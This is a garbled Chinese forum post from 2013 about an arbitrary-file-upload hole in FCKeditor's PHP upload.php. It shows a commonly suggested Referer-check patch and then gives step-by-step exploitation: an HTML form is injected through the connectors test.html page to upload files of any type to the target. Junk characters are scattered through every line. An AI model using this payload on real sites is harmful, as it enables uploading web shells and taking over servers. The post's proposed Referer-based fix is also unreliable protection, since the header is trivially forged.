漏洞文件:editors/fckeditor/editor/filemanager/upload/php/upload.php
/ X; Z% `8 h* y8 L+ E+ I- i! e3 E网上给出的修复方案是
9 ?+ ^2 M" k2 E修复方法,删除FCK编辑器用其他的编辑器3 y8 {7 E i" M8 `% }
或者找到 editors/fckeditor/editor/filemanager/upload/php/upload.php 文件
+ U$ A% v) x( f" t4 E在
2 @6 n; I) y0 l4 y2 _4 nrequire(‘config.php’);
* A% v3 o) ]7 I9 l. i& g' k4 W" ^require(‘util.php’);. I4 Q' J E+ `
的下面添加以下代码—————————–) w+ ~* M" D$ i
//防止外部提交
" _4 Z/ [3 F- M8 o7 J: {. _; zfunction outsidepost()
: O V7 ~% y$ i3 U{, x9 e# h" M5 ]2 f. Z: e. S* u3 M
$servername=$_SERVER['SERVER_NAME'];: n. j. A# a- P3 A8 P
$sub_from=@$_SERVER['HTTP_REFERER'];
) p+ x8 u; W5 o: o9 o$sub_len=strlen($servername);
$ I& g9 T8 W0 M& ]$checkfrom=substr($sub_from,7,$sub_len);2 O% ~2 k/ f# a& P
if($checkfrom!=$servername){5 e# t8 `# P$ i5 |6 @- G+ j$ x
echo(“you don’t outsidepost!”);9 I2 e5 v+ u+ d' G0 G a5 X
exit;
& Y! @" b/ ^3 h0 j' h/ M4 D; Z% ^} S8 x% a# R! {- n+ A/ i- Q; a
}
4 o: e) U* w+ q- }; Ioutsidepost();
& k# X$ L i( {/ r" ^2 L+ l防止外部提交,但是没有防止内部提交,
2 g( D) d4 C2 J/ Z) H利用方法:5 g2 ]. O: l$ ]- Q! i
1,打开 editors/fckeditor/editor/filemanager/browser/default/connectors/test.html4 E6 L! c2 q# V
2,在Current Folder 框输入
+ P- A( }. K2 c7 R/ [; s<form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form>
2 U/ T& {; `, K3 H+ R! ~/ @/ b然后 Get Folders and Files 就会出现一个上传表单,即可上传任意文件类型。
( u& x% E3 A; R$ q4 g jPS:如果 editors与上传的文件夹设置了403 500 404 权限 利用就无效了。 |
发表于 2013-1-11 21:12:44
收藏
支持
反对